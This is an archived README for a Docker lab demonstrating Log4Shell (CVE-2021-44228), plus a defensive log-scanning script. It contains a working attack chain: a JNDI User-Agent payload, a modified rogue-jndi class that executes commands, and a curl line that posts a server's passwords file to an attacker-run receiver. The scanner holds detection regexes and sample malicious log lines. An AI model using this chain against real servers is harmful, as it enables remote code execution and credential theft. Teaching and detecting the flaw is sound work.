Related vulnerability
Introduction
# CVE-2021-44228-docker-example
A simple demonstration of CVE-2021-44228 to transfer data from a vulnerable server to a web service controlled by an attacker.
All components involved are running via Docker.
## Components
### vulnerable-server
This is a standard Java server acting as the victim. It's running:
- Java `8u111`
- Web Application (Spring Boot 2.6.1)
- Log4J
**This server is `VULNERABLE` using this configuration.**
Additional Information:
- endpoint at `/logging` (GET) will log the user agent using Log4J
- `/foo/passwords.txt` exists (the attacker's target)
Content of `passwords.txt`:
```text
my secret
```
### malicious-receiver
This is a standard Java server acting as the data collector of the attacker. It's running:
- Java `17`
- Web Application (Spring Boot 2.6.1)
Additional information:
- endpoint at `receiver` (POST) will log the request body
### malicious-ldap
This is an LDAP server powered by [rogue-jndi](https://github.com/veracode-research/rogue-jndi).
Its `ExportJava` class has been modified so that commands passed via the `-c` flag get executed.
```java
public ExportObject() {
    try {
        // executes the command passed to rogue-jndi via the -c flag
        Runtime.getRuntime().exec(Config.command);
    } catch (Exception e) {
        e.printStackTrace();
    }
}
```
When the vulnerable server requests it, the LDAP server responds with a class that runs the following command when instantiated:
```shell
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt
```
This will effectively post the content of `/foo/passwords.txt` to the malicious receiver's prepared endpoint.
## Usage
1. Set up the Docker images by running:
```shell
./build.sh
```
2. Start the component containers by running:
```shell
./start.sh
```
3. Trigger the vulnerability by running:
```shell
curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
```
4. Check the log output of the malicious receiver component by running:
```shell
docker logs --timestamps docker_malicious-receiver_1
```
The output should contain the content of the server's `passwords.txt` file.
5. Stop the component containers by running:
```shell
./stop.sh
```
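From the defender's side, the request in step 3 is what a log review or detection rule should catch. The following Python scanner is an added example (not part of this repository) that flags Log4j JNDI lookup patterns in access-log lines and collects the callback hosts for blocking; the log lines are constructed here, reusing the addresses from this README.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# High confidence: a JNDI lookup with any protocol scheme, matched case-insensitively.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s:]+)(?::(\d+))?", re.IGNORECASE
)
# Medium confidence: any Log4j-style "${name:value}" lookup in client-controlled input.
LOOKUP_RE = re.compile(r"\$\{[^}]*:[^}]*\}")


@dataclass
class Finding:
    line_no: int
    severity: str          # "high" or "medium"
    scheme: Optional[str]  # e.g. "ldap" (high findings only)
    host: Optional[str]    # callback host (high findings only)
    snippet: str           # the matched text


def scan_log_lines(lines: List[str]) -> List[Finding]:
    """Return one Finding per log line that carries a lookup pattern."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = JNDI_RE.search(line)
        if m:
            findings.append(Finding(n, "high", m.group(1).lower(), m.group(2), m.group(0)))
            continue
        m = LOOKUP_RE.search(line)
        if m:
            findings.append(Finding(n, "medium", None, None, m.group(0)))
    return findings


def callback_hosts(findings: List[Finding]) -> List[str]:
    """Distinct hosts the payloads point at, for egress blocking and IOC sharing."""
    return sorted({f.host for f in findings if f.host})


# Constructed sample access log: a benign request, the request from step 3 of this
# README, a mixed-case variant on another port, and a non-JNDI lookup.
SAMPLE_ACCESS_LOG = [
    '172.18.18.1 - - [11/Dec/2021:10:00:00 +0000] "GET /logging HTTP/1.1" 200 12 "-" "curl/7.68.0"',
    '172.18.18.1 - - [11/Dec/2021:10:00:05 +0000] "GET /logging HTTP/1.1" 200 12 "-" "${jndi:ldap://172.18.18.10/o=reference}"',
    '172.18.18.1 - - [11/Dec/2021:10:00:09 +0000] "GET /logging HTTP/1.1" 200 12 "-" "${JNDI:LDAPS://198.51.100.7:636/x}"',
    '172.18.18.1 - - [11/Dec/2021:10:00:12 +0000] "GET /logging HTTP/1.1" 200 12 "-" "${env:HOME}"',
]

if __name__ == "__main__":
    results = scan_log_lines(SAMPLE_ACCESS_LOG)
    for f in results:
        print(f"line {f.line_no}: {f.severity:6} {f.snippet}")
    print("callback hosts:", callback_hosts(results))
```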
File snapshot
```text
[4.0K] /data/pocs/56c218318accd7296ac2e89132d32829bf10e6aa
├── [ 429] build.sh
├── [4.0K] docker
│   ├── [ 884] docker-compose.yml
│   ├── [4.0K] ldap
│   │   ├── [ 180] ldap.Dockerfile
│   │   ├── [ 11M] RogueJndi-1.1.jar
│   │   └── [ 170] start.sh
│   ├── [ 130] receiver.Dockerfile
│   └── [ 170] server.Dockerfile
├── [ 703] pom.xml
├── [2.1K] README.md
├── [4.0K] receiver
│   ├── [ 11K] cve-2021-44228-evil-receiver.iml
│   ├── [1.6K] pom.xml
│   └── [4.0K] src
│       └── [4.0K] main
│           ├── [4.0K] java
│           │   └── [4.0K] foo
│           │       └── [4.0K] bar
│           │           └── [4.0K] cve202144228evilreceiver
│           │               ├── [4.0K] api
│           │               │   └── [ 668] ReceiveEndpoint.java
│           │               └── [ 361] Cve202144228EvilReceiverApplication.java
│           └── [4.0K] resources
│               └── [  21] application.yml
├── [4.0K] server
│   ├── [ 12K] cve-2021-44228-server.iml
│   ├── [1.9K] pom.xml
│   └── [4.0K] src
│       └── [4.0K] main
│           ├── [4.0K] java
│           │   └── [4.0K] foo
│           │       └── [4.0K] bar
│           │           └── [4.0K] cve202144228server
│           │               ├── [4.0K] api
│           │               │   └── [ 773] LogEndpoint.java
│           │               └── [ 343] Cve202144228ServerApplication.java
│           └── [4.0K] resources
│               └── [  21] application.yaml
├── [ 150] start.sh
└── [ 149] stop.sh

20 directories, 21 files
```
Notes
1. It is recommended to access the original source first.
2. If the source is no longer available or cannot be accessed, please send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.